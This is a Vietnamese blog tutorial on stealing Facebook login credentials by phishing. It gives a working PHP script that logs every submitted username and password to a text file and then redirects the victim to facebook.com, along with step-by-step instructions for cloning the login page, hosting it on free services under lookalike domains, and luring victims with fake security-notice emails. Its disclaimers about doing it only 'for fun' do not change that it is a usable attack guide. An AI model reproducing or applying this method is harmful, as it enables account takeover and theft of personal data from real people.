Nghe hack facebook thì các bạn có thể nghỉ rằng chắc là lừa đảo hay chém gió cho vui, cũng bởi vì facebook là một tập đoàn mạng xã hội lớn nhất hiện tại, hệ thống server, bảo mật của nó là thứ thuộc dạng “siêu nhân” hết rồi, nhưng chúng ta cũng biết rằng, không có 1 căn nhà nào hoàn hảo cả, thế nào cũng phải có lổ cho những con kiến chui vào. ^^
Nói cho vui thôi, thật chất là với khả năng gà mờ của mình thì chẳng thể làm gì thằng facebook cả, mục đích là vọc phá cho vui, ở đây chúng ta sử dụng phương pháp phishing để đánh lừa nạn nhân. Phương pháp này thì cũng thuộc dạng cổ điển nhưng vẫn rất hiệu quả, đã được nhiều hacker dùng để lấy cắp thông tin tài khoản ngân hàng hay các thông tin bí mật khác. Trong bài viết này, mình sẽ hướng dẫn sử dụng 1 cách cơ bản và dễ nhất cho mọi người nhưng cũng đòi hỏi bắt buộc các bạn phải có 1 chút kiến thức về web, hosting. Còn nếu không có thì phải tìm hiểu cách tạo 1 trang web miễn phí rồi hãy đọc tiếp.
Vào vấn đề chính, mục đích của chúng ta là đánh lừa nạn nhân rằng họ đang ở website của facebook (nhưng thật chất là web fake của mình tạo ra thôi) và đăng nhập tài khoản với password vào, lúc này tài khoản và password sẽ tự động gửi về host của mình.
Và 1 điều cần nói là hy vọng các bạn không sử dụng phương pháp này để quậy phá hay có hành vi trộm cắp thông tin cá nhân của người khác, chủ yếu là để vọc phá thôi.
Click chuột phải vào vùng trống và chọn view source (firefox) hoặc view page source (chrome), nó sẽ ra 1 trang toàn là chữ với chữ, chúng ta copy hết nguyên đống code này về bỏ vào 1 file notepad, save lại với tên file là index.html để nó thành 1 web tĩnh. Bạn có thể mở nó lên lại thử xem có phải hiện ra trang đăng nhập của facebook ko.
Xong phần web fake, giờ chúng ta tạo mới 1 file notepad với nội dung như sau:
<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“pass.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
Chúng ta save file này lại với tên phishing.php. Tổng cộng ta có 2 file là index.html và phishing.php
Bây giờ tới phần hosting, các bạn có thể tạo host miễn phí tại
bytehost.com, và tên miền miễn phí tại
dyn.com/dns .Các bạn nên đặt 1 cái tên miền nào liên quan tới facebook để dễ đánh lừa người khác dạng như
facebook.dyndns.com hay
facebooks.dyndns.com , facebook.bytehost7.com
Sau khi tạo và kết nối xong host với domain, chúng ta vào phần contolpanel của hosting, rồi kiếm mục file manager, trong file manager ta sẽ thấy có thư mục htdocs doc or publish_html (host khác), chúng ta vào trong thư mục đó xóa file index.htm trong đó nếu có, sau đó chọn upload và up 2 file phishing.phpvà index.html từ máy tính lên thư mục này.
Chúng ta vào vào website bằng tên miền vừa đăng ký ở trên thử xem kết quả, nếu ra giao diện của trang đăng nhập trên face là ok. Còn nếu chưa được thì kiểm tra lại xem hosting và tên miền.
Thật chất chỗ này không khó, nhưng đòi hỏi phải có chút kiến thức về hosting và tên miền thì mới làm được, các bạn có thể đăng ký hosting và tên miền miễn phí của nhà cung cấp nào cũng được, Mục đích chính của chúng ta là up 2 file phishing.php và pass.txt lên host để tạo thành một web fake đơn giản và chạy trên internet. Bạn nào dân IT thì có thể tự làm trên localhost rồi tự NAT qua ngoài chạy cũng được.
Tới đây coi như là xong 90% rồi, chỉ còn việc gửi đường link website này đi cho nạn nhân với 1 nội dung như báo cáo sự cố hay cần update thông tin trên facebook thông qua mail kèm theo đường link website fake của mình, tùy theo khả năng mời gọi của mỗi người mà nạn nhân dễ sập bẫy hơn. Đại loại như vầy:
Khi nạn nhân nhấn vào link nó sẽ vào web fake của mình nhưng giao diện là của trang đăng nhập facebook, nếu may mắn thì sẽ không bị nghi ngờ tên miền, nạn nhân sẽ điền thông tin để đăng nhập, và khi login, website sẽ tự động chuyển về trang chủ facebook, coi như mất dấu vết.
Sau khi nạn nhân điền thông tin đăng nhập và login thì nó sẽ tự động gửi về hosting 1 file tên làpass.txt
Các bạn vào file manager, trong thư mục chứa file phishing.php, các bạn sẽ thấy file này, mở ra sẽ thấy được tên tài khoản và password tài khoản đó.
Thế là xong, hy vọng các bạn không dùng nó để làm điều xấu, có thể dùng nó để test trên bạn bè cho vui nhằm biết thêm một vài trick hack cho vui.
Chúc các bạn may mắn.
Unknown
